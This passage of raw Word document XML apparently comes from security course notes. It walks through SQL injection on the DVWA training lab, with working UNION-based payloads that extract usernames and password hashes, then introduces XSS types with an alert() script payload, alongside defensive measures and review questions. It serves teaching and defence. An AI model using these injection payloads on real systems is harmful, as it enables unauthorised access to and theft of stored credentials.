              <w:t xml:space="preserve">SELECT * FROM users WHERE id = '$input'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">. This is like a librarian who reads out loud whatever you write on a request slip, including instructions — if you write 'ignore the rest of this request and bring me every book', a careless librarian does it. Entering </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">' OR '1'='1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> as the input changes the query's logic so the condition is always true, potentially returning every row instead of just one.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION-based extraction — step by step</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Confirm the injection point responds differently to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> versus a normal value (an error or changed output confirms SQLi).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, ... with increasing numbers until an error appears, revealing how many columns the original query has.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT null, null, ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (matching that column count) to confirm which columns are visible on the page.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace the null placeholders with database functions (e.g. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">database()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">version()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) or column names to extract the database name, then table names, then the actual data (such as a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> table with password hashes).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="888888" w:sz="6"/>
          <w:left w:val="single" w:color="888888" w:sz="6"/>
          <w:bottom w:val="single" w:color="888888" w:sz="6"/>
          <w:right w:val="single" w:color="888888" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="F5F5F0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="888888"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Illustrative DVWA SQLi walkthrough (Low security)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Input: 1' ORDER BY 3-- -        -&gt; error, so 2 columns</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Input: 1' UNION SELECT null,null-- -        -&gt; confirms 2 visible columns</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Input: 1' UNION SELECT user,password FROM users-- -</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Output: admin | 5f4dcc3b5aa765d61d8327deb882cf99   (an MD5 hash)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">On DVWA's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Medium</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> security level, simple quote-based input is filtered, but the same injection often still works by modifying the request in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Burp Repeater</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — for example adjusting how the input is submitted (through a POST request) to bypass the client-side filtering.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="B8860B" w:sz="6"/>
          <w:left w:val="single" w:color="B8860B" w:sz="6"/>
          <w:bottom w:val="single" w:color="B8860B" w:sz="6"/>
          <w:right w:val="single" w:color="B8860B" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="FFF6E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B8860B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">✎ Example — Why MD5 hashes are a problem and how parameterised queries help (observation questions)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Why is MD5 insufficient for password storage? What should be used instead?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> MD5 is fast and has publicly available rainbow tables for common passwords, so an extracted MD5 hash like </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">5f4dcc3b5aa765d61d8327deb882cf99</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> (which is the hash of the word “password”) can be reversed almost instantly via lookup. Slow, salted algorithms such as </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">bcrypt</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">scrypt</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> or </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Argon2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> should be used instead.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">How would a parameterised query prevent SQL injection?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> A parameterised (prepared) statement sends the SQL structure and the user's input </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">separately</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> to the database — the input is never parsed as part of the SQL syntax, only ever treated as a literal value. This means a value like </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">' OR '1'='1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> is searched for literally (and simply won't match anything) rather than being interpreted as SQL logic.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="1E7B45" w:sz="6"/>
          <w:left w:val="single" w:color="1E7B45" w:sz="6"/>
          <w:bottom w:val="single" w:color="1E7B45" w:sz="6"/>
          <w:right w:val="single" w:color="1E7B45" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="E9F7EF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1E7B45"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">⚑ Defensive Measures</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Parameterised queries/prepared statements (primary defence), least-privilege database accounts, input validation, Web Application Firewalls as a secondary layer, and disabling verbose database error messages in production.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.5 Cross-Site Scripting (XSS)</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1949"/>
        <w:gridCol w:w="7797"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>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Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7797"/>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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>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Reflected XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7797"/>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The malicious script is part of the request (e.g. a URL parameter) and is immediately reflected back in the response — affects only the one victim who clicks a crafted link</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>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Stored XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7797"/>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The malicious script is saved on the server (e.g. in a comment or guestbook entry) and runs for every visitor who later views that content — more dangerous because it is persistent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>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DOM-based XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7797"/>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The vulnerability exists entirely in client-side JavaScript that writes untrusted data into the page, without the payload ever being sent to the server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="B8860B" w:sz="6"/>
          <w:left w:val="single" w:color="B8860B" w:sz="6"/>
          <w:bottom w:val="single" w:color="B8860B" w:sz="6"/>
          <w:right w:val="single" w:color="B8860B" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="FFF6E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B8860B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">✎ Example — DVWA Reflected XSS (Low security) — basic alert demonstration</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Submitting </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;script&gt;alert('XSS')&lt;/script&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> into a name field that echoes input back unescaped causes the browser to execute the script and show an alert box, proving the input was not sanitised. On </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
